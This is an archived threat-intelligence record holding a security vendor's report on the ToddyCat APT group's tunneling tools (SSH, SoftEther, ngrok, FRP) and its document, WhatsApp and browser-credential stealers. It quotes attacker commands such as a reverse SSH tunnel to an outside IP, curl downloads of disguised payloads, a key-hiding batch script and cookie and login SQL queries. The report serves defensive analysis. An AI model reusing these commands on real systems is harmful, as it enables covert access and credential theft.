{ "id": "1f980ce6-014a-4bb3-b0f2-fb62ac846961", "created_at": "2026-04-06T00:16:52.912052Z", "updated_at": "2026-04-10T03:33:16.324809Z", "deleted_at": null, "sha1_hash": "42091812ae0c94478eda510aeca9b38fc6c273df", "title": "ToddyCat is making holes in your infrastructure", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 414703, "plain_text": "ToddyCat is making holes in your infrastructure\r\nBy Andrey Gunkin\r\nPublished: 2024-04-22 · Archived: 2026-04-05 16:45:55 UTC\r\nWe continue covering the activities of the APT group ToddyCat. In our previous article, we described tools for\r\ncollecting and exfiltrating files (LoFiSe and PcExter). This time, we have investigated how attackers obtain\r\nconstant access to compromised infrastructure, what information on the hosts they are interested in, and what tools\r\nthey use to extract it.\r\nToddyCat is an APT group that predominantly targets governmental organizations, some of them defense related,\r\nlocated in the Asia-Pacific region. One of the group’s main goals is to steal sensitive information from hosts.\r\nDuring the observation period, we noted that this group stole data on an industrial scale. To collect large volumes\r\nof data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide\r\nseveral alternative means to continuously access and monitor systems they attack. We decided to investigate how\r\nthis was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the\r\nattackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most\r\ncases, the adversary connected, transferred and run all required tools with the help of PsExec or Impacket.\r\nHaving several tunnels to the infected infrastructure implemented with different tools allow attackers to maintain\r\naccess to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the\r\ninfrastructure, attackers are able to perform reconnaissance and connect to remote hosts.\r\nReverse SSH Tunnel\r\nOne way to gain access to remote network services is to create a reverse SSH tunnel.\r\nAttackers use several files to launch a reverse SSH tunnel:\r\n1. 1 The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it\r\n2. 2 An OPENSSH private key file\r\n3. 3 The “a.bat” script to hide the private key file\r\nThe attackers transferred all files to the target host via SMB with the help of shared folders (T1021.002: Remote\r\nServices: SMB/Windows Admin Shares).\r\nThe attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original\r\nname and was placed inside folders whose names indicated the presence of an SSH client in the system.\r\nC:\\program files\\OpenSSH\\ssh.exe\r\nC:\\programdata\\sshd\\ssh.exe\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 1 of 18\n\nC:\\programdata\\ssh\\ssh.exe\r\nThe private key files required for establishing a connection to the remote server were copied to the following\r\npaths.\r\nC:\\Windows\\AppReadiness\\read.ini\r\nC:\\Windows\\AppReadiness\\data.dat\r\nC:\\Windows\\AppReadiness\\log.dat\r\nC:\\Windows\\AppReadiness\\value.dat\r\nOpenSSH private key files are normally created without extensions, but they can be given the extension .key or\r\nsimilar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true\r\npurpose. Files like that look less suspicious in the command-line interface than .key files or files without an\r\nextension.\r\nAfter the private key files have been copied to the AppReadiness folder, the adversary copies and runs an a.bat\r\nscript. In the attacked systems, it was found mostly in temporary directories or in users’ shared folders.\r\nThis file contains the following commands.\r\n@echo off\r\n::# Set Key File Variable:\r\nSet Key=\"C:\\Windows\\AppReadiness\"\r\ntakeown /f \"%Key%\"\r\nicacls \"%Key%\" /remove \"BUILTIN\\Administrators\" \u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"Administrators\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"NT AUTHORITY\\Authenticated Users\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"CREATOR OWNER\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"BUILTIN\\Users\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" /remove \"Users\" \u003e\u003e \"%temp%\\a.txt\"\r\nicacls \"%Key%\" \u003e\u003e \"%temp%\\a.txt\"\r\n::# Remove Variable:\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 2 of 18\n\nset \"Key=\"\r\nIn Windows, C:\\Windows\\AppReadiness is part of the AppReadiness service and stores application files for\r\ninitial configuration when applications are first launched or when a user logs on for the first time.\r\nThe icacls command output for the AppReadiness folder with default values\r\nThe image above shows the default permissions for this folder:\r\nAdministrators and system: full permissions\r\nAuthorized users: read-only permissions\r\nThis means that regular users can view the contents of the folder.\r\nThe a.bat script sets the system as the owner of the folder and removes all other users from its discretionary\r\naccess control list (DACL). The image below shows the DACL for C:\\Windows\\AppReadiness after the script\r\nhas run:\r\nThe icacls command output for the AppReadiness folder after a.bat script has executed\r\nOnce the permissions have been changed, neither normal users nor administrators will be able to access this\r\nfolder. Attempting to open it will cause a “no permission” error.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 3 of 18\n\nAccess denied error and Security tab for the AppReadiness folder\r\nTo start the tunnel, attackers create a scheduled task that runs the following command.\r\nC:\\PROGRA~1\\OpenSSH\\ssh.exe -i C:\\Windows\\AppReadiness\\value.dat -o\r\nStrictHostKeyChecking=accept-new -R 31481:localhost:53\r\nsystemtest01@103[.]27.202.85 -p 22222 -fN\r\nThis command creates an SSH connection to a remote server with the IP address 103[.]27.202.85 on port 22222 as\r\nthe user named systemtestXX, where XX is a number. This connection will redirect network traffic from a certain\r\nport on the server to a certain port on the infected host. This is needed to provide the malicious server with\r\nconstant access to the services running on the target host and listening on the specified port.\r\nIn the example above, the user systemtest01 establishes a connection that redirects traffic from port 31481 on the\r\nserver to port 53 on the target host. A connection like this created on domain controllers allows attackers to obtain\r\nthe IP addresses of hosts on the internal network through DNS queries.\r\nEach user is assigned to a different port on the infected host. For example, the user systemtest05 redirects traffic\r\nfrom the malicious server to port 445, normally used by SMB services.\r\nThe remote server IP information is shown in the table below.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 4 of 18\n\nIP\r\nCountry\r\n+ ASN\r\nNet name\r\nNet\r\nDescription\r\nAddress Email\r\n103.27.202[.]85\r\nThailand,\r\nAS58955\r\nBANGMOD-VPS-NETWORKBangmod\r\nVPS\r\nNetwork\r\nBangmod-IDC\r\nSupermicro\r\nThailand\r\nPowered by\r\nCSloxinfo\r\nsupport@bangmod.co.th\r\nThe whole process of creating an SSH tunnel can be described with the diagram given below.\r\nDiagram of SSH tunnel creation\r\nSoftEther VPN\r\nThe next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN\r\npackage.\r\nSoftEther VPN is an open-source solution developed as part of academic research at the University of Tsukuba\r\nthat allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP,\r\nL2TPv3, EtherIP and others.\r\nTo launch the VPN server, the attackers used the following files:\r\nvpnserver_x64.exe: a digitally signed VPN server executable\r\nhamcore.se2: a container file that includes components required to run vpnserver_x64.exe\r\nvpn_server.config: server configuration\r\nIn the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a\r\ncommand-line parameter.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 5 of 18\n\nIn virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected\r\nsystem. The following names of, and paths to, this file are known:\r\nc:\\programdata\\ssh\\vmtools.exe\r\nc:\\programdata\\lenovo\\lenovo\\kln.exe\r\nc:\\programdata\\iobit\\iobitrtt\\tmp\\mstime.exe\r\nc:\\perflogs\\ecache\\boot.exe\r\nC:\\users\\public\\music\\wia.exe\r\nc:\\windows\\debug\\wia\\wia.exe\r\nc:\\users\\public\\music\\taskllst.exe\r\nc:\\programdata\\lenovo\\lenovo\\main.exe\r\nc:\\programdata\\intel\\gcc\\gcc\\boot.exe\r\nc:\\programdata\\lenovo\\lenovodisplaycontrolcenterservice\\netscan.exe\r\nc:\\programdata\\kasperskylab\\kaspersky.exe\r\nYou may notice that in some cases, the attackers used the names of security products to conceal the purpose of the\r\nfile.\r\nThe file hamcore.se2 was not renamed in the attacked systems, as it was loaded by the VPN server by name from\r\nthe same folder where the VPN server executable was located.\r\nTo transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared\r\nresources (T1021.002 Remote Services: SMB/Windows Admin Shares), and downloaded files from remote\r\nresources using the curl utility (see below).\r\n\"cmd.exe\" /C curl http://www.netportal.or[.]kr/common/css/main.js -o\r\nc:\\windows\\debug\\wia\\wia.exe \u003e C:\\WINDOWS\\Temp\\vwqkspeq.tmp 2\u003e\u00261\r\n\"cmd.exe\" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o\r\nc:\\windows\\debug\\wia\\hamcore.se2 \u003e C:\\WINDOWS\\Temp\\nohEicOE.tmp 2\u003e\u00261\r\nWe observed the following remote resources being used as download sources.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 6 of 18\n\nURL Original file name\r\nhxxp://www.netportal.or[.]kr/common/css/main.js vpnserver_x64.exe\r\nhxxp://www.netportal.or[.]kr/common/css/ham.js Hamcore.se2\r\nhxxp://23.106.122[.]5/hamcore.se2 Hamcore.se2\r\nhxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe vpnserver_x64.exe\r\nhxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2 Hamcore.se2\r\nIn most cases, the configuration file was copied along with the server executable. However, in some cases, it was\r\nnot copied but created by executing vpnserver_x64.exe with the options /install or /usermode_hidetray, and then\r\nedited.\r\n\"cmd.exe\" /C c:\\users\\public\\music\\taskllst.exe /install \u003e C:\\Windows\\Temp\\fnOcaiqm.tmp 2\u003e\u00261\r\n\"cmd.exe\" /C c:\\users\\public\\music\\taskllst.exe /usermode_hidetray \u003e C:\\Windows\\Temp\\TSwkLRsR.tmp\r\nIn this case, after installing the server in the system, the attackers changed the server settings in\r\nvpn_server.config.\r\nData for connecting the remote client to the server and its authentication details are added to the configuration file:\r\nAccountName Hostname\r\nha.bbmouseme[.]com 118[.]193.40.42\r\nNgrok agent and Krong\r\nAnother way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An\r\napplication running on the user’s host with access to the local infrastructure can connect through a legitimate\r\nagent to the cloud and redirect traffic or run certain commands.\r\nNgrok is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The\r\nattackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain\r\nport on these hosts.\r\nThe agent can be started, for instance, with the following command.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 7 of 18\n\n\"cmd\" /c \"cd C:\\windows\\temp\\ \u0026 Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112\r\n--\r\nauthtoken 2GskqGD\u003ctoken\u003etxB7WyV\"\r\nThe port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file\r\nside-loaded (T1574.002 Hijack Execution Flow: DLL Side-Loading) with a legitimate application digitally\r\nsigned by AVG TuneUp. The tool receives through the command-line interface the address and the port on which\r\nto expect a connection.\r\n\"cmd\" /c \"cd C:\\windows\\temp\\ \u0026 SystemInformation.exe 0.0.0.0 54112\"\r\nKrong is a proxy that encrypts the data transmitted through it using the XOR function.\r\nCode snippet for deciphering received data\r\nThis allows Krong to hide the contents of the traffic to evade detection.\r\nFRP client\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 8 of 18\n\nAfter creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the FRP\r\nclient. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located\r\nbehind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.\r\nThe attackers used two files to run the client:\r\nFrpc.exe: a FRP client executable file\r\nFrpc.toml: a client configuration file\r\nThe files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to\r\n.ini, as is the case with OpenSSH private key files.\r\nAfter copying the files to the target host, the attackers create a service with an arbitrary name, which is started via\r\nthe following command.\r\nc:\\windows\\debug\\tck.exe -c c:\\windows\\debug\\tc.ini\r\nThis starts the FRP client with the configuration file “tc.ini”. The traffic is then routed from C2 through this tool.\r\nCuthead for data collection\r\nRecently, ToddyCat started using a new tool we named cuthead to search for documents. The name originated\r\nfrom the “file description” field of the sample we found. It is a .NET compiled executable designed to search for\r\nfiles and store those it finds inside an archive. The tool can search for specified file extensions or words in the file\r\nname.\r\nCuthead tool accepts the following arguments:\r\nfkw.exe \u003cdate\u003e \u003cextensions\u003e [keywords]\r\nDate: the date when the file was last modified, in yyyyMMdd The search looks for files modified on that\r\ndate or later\r\nExtensions: a string without spaces that contains file extensions separated by semicolons\r\nKeywords: a string without spaces that contains semicolon-delimited words to look for in file names\r\nHere is an example of a cuthead launch command.\r\n\"c:\\intel\\fkw.exe\" 20230626 pdf;doc;docx;xls;xlsx\r\nIn this case, the attackers collected all MS Excel, MS Word and PDF files modified after June 26, 2023.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 9 of 18\n\nOnce launched, the tool processes the command-line parameters and begins a recursive search for files in the file\r\nsystem on all available drives (T1005 Data from Local System). Folders that contain the following substrings are\r\nexcluded from the search.\r\n$\r\nWindows\r\nProgram Files\r\nProgramdata\r\nApplication Data\r\nProgram Files (x86)\r\nDocuments and Settings\r\nAlso, the files are excluded from the search if they meet the following criteria:\r\nThe file size is greater than 50 Mb (52428800 bytes).\r\nThe file extensions do not match those specified in the command-line parameters.\r\nThe names do not contain the keywords specified in the command-line parameters.\r\nA list of files found by the search is passed to the function that creates ZIP archives with the password\r\n“Unsafe404”. In different versions of the tool, this function has different names but the same purpose. The open-source tool icsharpcode/SharpZipLib v. 0.85.4.369 is used for creating archives (T1560.002 Archive Collected\r\nData: Archive via Library).\r\nSeveral later variants of cuthead were found with all required options – a list of file extensions and a last modified\r\ndate that was typically within the previous 7 days – hardcoded within the software. We believe this was done to\r\nautomate the collection process.\r\nWAExp: WhatsApp data stealer\r\nThis tool is written in .NET and designed to search for and collect browser local storage files containing data from\r\nthe web version of WhatsApp (web.whatsapp.com). For users of the WhatsApp web app, their browser local\r\nstorage contains their profile details, chat data, the phone numbers of users they chat with and current session data.\r\nAttackers can gain access to this data by copying the browser’s local storage files.\r\nThe executable accepts the following arguments.\r\napp.exe [check|copy|start] [remote]\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 10 of 18\n\nCheck: checks the presence of data on the host.\r\nCopy: copies data it finds to the temporary folder.\r\nStart: first, copies the data to the temporary folder and then, packs the data into an archive file.\r\nRemote: the name of the remote host.\r\nWhen executed with “check“, the tool begins searching for user folders. If “remote” is specified, user folders are\r\nsearched along “\\\\[remote]\\C$\\users\\“. If it is not specified, the malware uses the environment variable\r\n%SystemDrive% value, retrieving the name of the system drive from it. It then searches inside the Users folder\r\non that drive. Next, the tool goes through all folders in this directory except the following default ones.\r\nAll Users\r\nDefault User\r\nDefault\r\nPublic\r\nAfter it locates the user folders, WAExp seeks out file paths for WhatsApp database files in the Chrome, Edge,\r\nand Mozilla local storages.\r\nForChrome, the tool opens \u003cUser\u003e\\Appdata\\local\\Google\\ and for Edge,\r\n\u003cUser\u003e\\Appdata\\local\\Microsoft\\Edge\\. Inside these, it looks for a folder with the following name inside the\r\nsubfolders.\r\nhttps_web.whatsapp.com_0.indexeddb.leveldb\r\nFor Mozilla, the tool opens\u003cUser\u003e\\Appdata\\roaming\\ and looks for a folder with the following name inside the\r\nsubfolders:\r\nRoaming may contain several Mozilla folders with web.whatsapp.com storage data. For example,Mozilla\r\nThunderbird can store this data too, as it supports a WhatsApp plugin.\r\nWAExp “check” output with results for Chrome, Edge, Firefox and Thunderbird\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 11 of 18\n\nIn the image above, you can see the output of the tool running with the “check” parameter. It shows storage files\r\nfor Chrome, Edge and Firefox, as well as the Thunderbird mail client detected on the host.\r\nWhen executed with the “copy” parameter, WAExp copies all whatsapp.com data storage files in the system to the\r\nfollowing temporary storage folder.\r\nC:\\Programdata\\Microsoft\\Default\\\r\nThe last parameter that the tool uses is “start”. It gathers target files inside a temporary folder, as described in the\r\ncopy function, and packs these into an archive with the help of the System.IO.Compression.ZipFile module\r\n(T1560.002 Archive Collected Data: Archive via Library).\r\nIt saves the archive file under a name consisting of the word ‘Default’ and a timestamp, without extension, at the\r\nfollowing path:\r\nC:\\Programdata\\Microsoft\\Default-yyyyMMdd-hhmmss\r\nAfter that, it deletes the temporary folder, along with the web browsers’ and other clients’ folders containing\r\nweb.whatsapp.com data.\r\nThe image below shows an example of WAExp output when run with the various startup parameters.\r\nWAExp output for its various command-line parameters\r\nThe operations shown above collect Chrome data and generate an archive, whose contents are shown below.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 12 of 18\n\nArchive file containing data stolen by WAExp\r\nTomBerBil for stealing passwords from browsers\r\nIn addition to the data that attackers can collect from hosts, they are also interested in obtaining access to all\r\nonline services that target users have access to. For an adversary with high privileges in the system, one fairly easy\r\nway to do this is to decrypt browser data containing cookies and passwords that the user may have saved to\r\nautofill authentication forms (T1555.003 Credentials from Password Stores: Credentials from Web\r\nBrowsers).\r\nThere are many open-source tools available for decrypting storage data, one of these being mimikatz. The\r\nproblem for the adversary is that these are well known to security systems and will immediately raise red flags if\r\ndetected in the infrastructure.\r\nTo avoid detection, attackers have created a range of tools implemented with different technologies and designed\r\nfor the same purpose: to extract cookies and passwords from Chrome and Edge. Both browsers use the\r\nCryptProtectData feature from DPAPI (Data Protection Application Programming Interface) to encrypt data. It\r\nprotects data with the current user’s password and a special encryption master key.\r\nAll TomBerBil variants work according to the same principle. After starting, the malware begins to enumerate all\r\nprocesses running in the system and search for all instances of explorer.exe. It identifies the process users and\r\ncompiles a list.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 13 of 18\n\nUsername identification function\r\nThe image above shows an example of the function that identifies users by process ID. It sends a WMI request to\r\nthe Win32_Process class to receive an object whose processID property equals the given PID. It then calls the\r\nGetOwner method, which returns the user and domain name for the process.\r\nAfter this, the malware searches for the encryption key, stored in the encrypted_key field in the following\r\nbrowser JSON files.\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Local State\r\nIt then impersonates the users it identified and attempts to decrypt the master key using the CryptUnprotectData\r\nfunction. To do this, it calls Unprotect function from the System.Security.Cryptography.ProtectedData\r\npackage, which, in turn, uses CryptUnprotectData function call from Windows DPAPI.\r\nCalling the Unprotect function\r\nThe image above shows an example of the Unprotect function call, which receives an array of bytes obtained\r\nfrom the encrypted_key field. The value of DataProtectionScope.CurrentUser is passed as the third parameter.\r\nThis means that the user context of the calling process will be used when decrypting the data. The tool\r\nimpersonates the users it finds in explorer.exe for this very purpose.\r\nIf the decryption is successful, the malware searches for Login Data and \\Network\\Cookies files inside the\r\nfollowing folders.\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Profile *\r\nIt copies any files it finds to the temporary folder, where it opens them as SQL database files and runs the\r\nfollowing queries.\r\nSELECT origin_url, username_value, password_value FROM logins\r\nSELECT cast(creation_utc as text) as creation_utc, host_key, name, path, cast(expires_utc as text) as\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 14 of 18\n\nexpires_utc, cast(last_access_utc as text) as last_access_utc, encrypted_value FROM cookies\r\nData retrieved this way is decrypted with the master key and saved in special files.\r\nMost versions of the malware tool log their actions. Below is an example of a log file that they generate:\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 15 of 18\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n[+] Begin 7/28/2023 1:12:37 PM\r\n[+] Current user SYSTEM\r\n[*] [5516] [explorer] [UserName]\r\n[+] Impersonate user UserName\r\n[+] Current user UserName\r\n[+] Local State File: C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Local State\r\n[+] MasterKeyBytes: 6j\u003c...\u003ek=\r\n[\u003e] Profile: C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Default\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data to\r\nC:\\Windows\\TEMP\\tmpF319.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpF319.tmp\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Network\\Cookies to\r\nC:\\Windows\\TEMP\\tmpFA1F.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpFA1F.tmp\r\n[+] Local State File: C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Local State\r\n[+] MasterKeyBytes: fv\u003c...\u003eGM=\r\n[\u003e] Profile: C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Login Data to\r\nC:\\Windows\\TEMP\\tmpFCB0.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpFCB0.tmp\r\n[+] Copy C:\\Users\\UserName\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies to\r\nC:\\Windows\\TEMP\\tmpFD5D.tmp\r\n[+] Delete File C:\\Windows\\TEMP\\tmpFD5D.tmp\r\n[+] Recvtoself\r\n[+] Current user SYSTEM\r\n[+] End 7/28/2023 1:12:52 PM\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 16 of 18\n\nOne of the variants mimics Kaspersky Anti-Virus. This executable, written in .NET, is named avpui.exe\r\n(T1036.005 Masquerading: Match Legitimate Name or Location) and contains relevant metadata:\r\nMetadata of the tool pretending to be KAV\r\nSome versions of the tool required specific command-line parameters to start. An example can be seen below:\r\nA TomBerBil variant started with a parameter\r\nIn several cases, beside using TomBerBil, the adversary created a shadow copy of the disk and archived the User\r\nData file with 7zip for the further exfiltration.\r\nwmic shadowcopy call create Volume='C:\\'\r\n\"cmd\" /c c:\\Intel\\7z6.exe a c:\\Intel\\1.7z -mx0 -r\r\n\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Users\\\u003cusername\u003e\\AppData\\Local\\Google\\\r\nChrome\\\"User Data\\\"\r\nConclusion\r\nWe looked at several tools that allow the attackers to maintain access to target infrastructures and automatically\r\nsearch for and collect data of interest. The attackers are actively using techniques to bypass defenses in an attempt\r\nto mask their presence in the system.\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 17 of 18\n\nTo protect the organization’s infrastructure, we recommend adding to the firewall denylist the resources and IP\r\naddresses of cloud services that provide traffic tunneling. We also recommend limiting the range of tools\r\nadministrators are allowed to use for accessing hosts remotely. Unused tools must be either forbidden or\r\nthoroughly monitored as a possible indicator of suspicious activity. In addition, users must be required to avoid\r\nstoring passwords in their browsers, as it helps attackers to access sensitive information. Reusing passwords\r\nacross different services poses a risk of more data becoming available to attackers.\r\nIndicators of compromise\r\nFiles\r\nlegitimate tools\r\nC2 addresses\r\nLinks\r\nSource: https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nhttps://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/\r\nPage 18 of 18", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA" ], "references": [ "https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/" ], "report_names": [ "112443" ], "threat_actors": [ { "id": "d67df52c-a901-4d55-b287-321818500789", "created_at": "2024-04-24T02:00:49.591518Z", "updated_at": "2026-04-10T02:00:05.314272Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "ToddyCat" ], "source_name": "MITRE:ToddyCat", "tools": [ "Cobalt Strike", "LoFiSe", "China Chopper", "netstat", "Pcexter", "Samurai" ], "source_id": "MITRE", "reports": null }, { "id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5", "created_at": "2022-10-25T16:07:24.329539Z", "updated_at": "2026-04-10T02:00:04.939013Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Operation Stayin’ Alive", "Storm-0247" ], "source_name": "ETDA:ToddyCat", "tools": [ "CHINACHOPPER", "China Chopper", "Cuthead", "FRP", "Fast Reverse Proxy", "Impacket", "Krong", "LoFiSe", "Ngrok", "PcExter", "PsExec", "SIMPOBOXSPY", "Samurai", "SinoChopper", "SoftEther VPN", "TomBerBil", "WAExp" ], "source_id": "ETDA", "reports": null }, { "id": "60d96824-1767-4b97-a6c7-7e9527458007", "created_at": "2023-01-06T13:46:39.378701Z", "updated_at": "2026-04-10T02:00:03.307846Z", "deleted_at": null, "main_name": "ToddyCat", "aliases": [ "Websiic" ], "source_name": "MISPGALAXY:ToddyCat", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434612, "ts_updated_at": 1775791996, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/42091812ae0c94478eda510aeca9b38fc6c273df.pdf", "text": "https://archive.orkl.eu/42091812ae0c94478eda510aeca9b38fc6c273df.txt", "img": "https://archive.orkl.eu/42091812ae0c94478eda510aeca9b38fc6c273df.jpg" } }